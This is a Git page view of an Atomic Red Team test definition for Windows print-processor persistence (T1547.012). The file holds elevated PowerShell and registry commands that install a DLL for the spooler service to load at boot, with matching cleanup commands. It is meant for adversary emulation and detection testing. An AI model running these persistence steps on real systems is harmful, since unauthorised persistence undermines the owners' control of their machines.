security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1547.012/T1547.012.yaml
T
Carrie Roberts d4709021fb Handle spaces in file paths (#2535) 
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

38 lines
2.0 KiB
YAML
Raw Permalink Blame History

attack_technique: T1547.012
display_name: 'Boot or Logon Autostart Execution: Print Processors'
atomic_tests:
- name: Print Processors
auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
description: |
Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
Note: The test assumes a x64 Windows operating system.
The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
supported_platforms:
- windows
input_arguments:
restart:
description: set to 1 if you want the computer to reboot as part of the test
type: integer
default: 0
executor:
command: |
if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
net stop spooler
Copy-Item "$PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll" C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
net start spooler
if(#{restart}){
Restart-Computer
}
cleanup_command: |
net stop spooler
rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
net start spooler
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink